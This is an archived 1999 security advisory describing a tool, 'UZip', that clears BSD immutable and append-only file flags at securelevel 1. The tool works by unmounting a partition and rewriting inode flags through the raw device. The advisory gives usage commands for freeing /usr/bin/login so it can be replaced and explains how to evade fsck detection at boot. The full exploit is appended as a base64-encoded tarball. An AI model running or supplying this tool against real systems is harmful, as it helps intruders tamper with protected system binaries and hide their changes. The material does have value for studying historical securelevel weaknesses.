6th Jul 1999 [SBWID-112]
COMMAND
BSD-fileflags
SYSTEMS AFFECTED
BSDish (FreeBSD tested)
PROBLEM
'Stealth' found following. 'The design and implementation of the
4.4 BSD operating system' page 263:
"... Security levels are defined as follows:
-1. [...]
0. [...]
1. Secure mode: The superuser-settable immutable and
appned-only flags cannot be cleared; [...]
2. [...]
"
That's not true. You can do it either with fsdb or with the
appended exploitcode. Below you'll find the code. The README
describes exactly why you can erase these flags in level 1.
It works at least with FreeBSD (3.1). This program can be used
to do something bad/cause errors/crashing systems. 'Stealth"
published recently an ext2-fs exploit for linux 2.0.x kernels that
allowed you to hide some data in files. In short 'Here's da UFS
version'. See README in archive for more valuable info.
4.4 BSD introduced securelevels and file-flags to make the OS
much more secure. You can set special flags on files, 'schg' for
example, which will prevent an attacker from deleting/modifieing
this file. (NOTE that filefalgs are not the same as filemodes;
you also have to have the permissions to modify the file ofcoze,
regardless of the fileflags). This ofcoze will only work if you
set the securelevel > 0:
[stealth@core]# sysctl -w kern.securelevel=1
kern.securelevel: -1 -> 1
There are 4 securelevels:
o -1: permanently insecure level. Fileflags are useless.
o 0: from the secure-point the same as level 0
o 1: interesting. Fileflags works now. So if you do
[stealth@core]# chflags schg /usr/bin/login
you won't be able to modify this file. As you might can
imagine this is very powerfull. To delete /usr/bin/login you
have to boot in single-user mode and then doing your work.
Attackers don't have access to this mode, so it's hard. You
are also disallowed to:
+ writing to /dev/mem and /dev/kmem
+ loading kernel-modules
+ writing directly to mounted disks
+ tracing init and forcing it to draw back securelevel
(init is the only process who can do it)
+ playing with /proc
Whoa! All the kewl things that can be done with computers
are forbidden! But even then: We will break it! Read on...
o 2: Heavy secure mode. You can do really nothing, even
writing to unmounted disks.
If you have read the above lines properly, you propably noticed
that in level 1 you are not allowed to write to MOUNTED disks.
Hah! Thats it! We'll unmount the disks and clean the flags via
direct file-access. Thats easy and good. I hear you screm: 'Hey,
I can't unmount the root-filesystem!' Right. But on most
BSD-systems you will have a very small amount of space on /
directly, instead you have an own partition for /usr,/var and
propably /etc. The BSD-distri even forces you to do so. Since
login resides in /usr/bin you will be able to free login from its
flags. So a new fucntion is born:
o ufs_clean_flags(const char *filename, const char *mp, const char *fs)
where 'mp' is the mountpoint where 'fs' is mounted on. Remember
that the device (fs) is one of /dev/rfd0, /dev/rda0s1 (my
zip-drive) and so on, so you have somewhere a 'r' in it. If you
simply use /dev/fd0 instead you will get BUSY-errors.
ufs_clean_flags() will stat() the requested file - obtaining the
inodenumber. It then unmount's the mountpoint and modifies the
fileflag that is part of the inode to be 0. It writes back the
result and re-mounts the device back to mountpoint.
ufs_cleanflags() works only in securelevel 1! Say, for example
you want to clean /usr/bin/login from the IMMUTABLE flag (schg),
so you can replace it. Since almost all BSD-systems have own
partition for /usr, you type
# uzip -F /dev/rwd0s1f -M /usr -c /usr/bin/login
ATTENTION: UZip directly access the filesystem, so you may can
fuck up your whole system and loose ALL data!!! If you
want simply play around with this piece, please,
please, please use a floppy-disk!
It is possible that you cant unmount /usr since someone is
executing a program there, so it's up to you to either:
o unmount it by hand via '-f' and remount it, or
o set FORCE_OR_NOT in ufs.c to 1. this will have the same
result, but will propably cause some errors in the
filesystem. However, it works if you do so, it was tested
with /var/log/messages.
UZip 1.1 also trys to restore the access and modification time
(E-Zip doesn't - see original README for more info). Well, if
someone runs runs fsck over the partition, he will see what you
have done. It is AFAIK not possible on (non-swap) partitions to
be undetectable with such things. This is the nature of
FS-modifieng tools. NOTE that you produce some inconsistency in
the current filesystem if you run UZip! However, UZip is smart
enough to set the CLEAN-flag in the current filesystem thus
avoiding detection at bootup by fsck. Smart sysops should run
fsck manually.
Install? There's not much to do. You need the sources of fsck
installed, the best is in /usr/src/sbin/fsck (if not there, edit
the makefile) since we link U-Zip against fsck-library. Bugs?
Sometimes, you will loose your data in the corrupted file. It's
strongly recommented to use executable/binary files for storing
data. Please read ext2-whitepaper if you want to know why.
You will run in trouble if you try to umount /usr without
'preparing' the system for it. To do this you also have to link
UZip statically b/c libc is in /usr. This also means the other
programs as syslogd etc. Some of them (getty) will die without
explicitly kill them. Althought hard, it's not impossible and on
test system 'stealth' was able to remove an immutable
/usr/bin/login _without_ booting into single user (why the hell
'user' isn't it for root?) mode. Regardless whats written in the
README, you have to define FORCE_OR_NOT to MNT_FORCE (not 1) if it
should be done the 'umount -f' way, sorry.
Code follows:
---
Content-Type: application/octet-stream; name="uzip.tgz"
Content-Transfer-Encoding: base64
Content-Disposition: inline; filename="uzip.tgz"
Content-MD5: tl+YXM3KXQVvOJUc59rOmg==
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
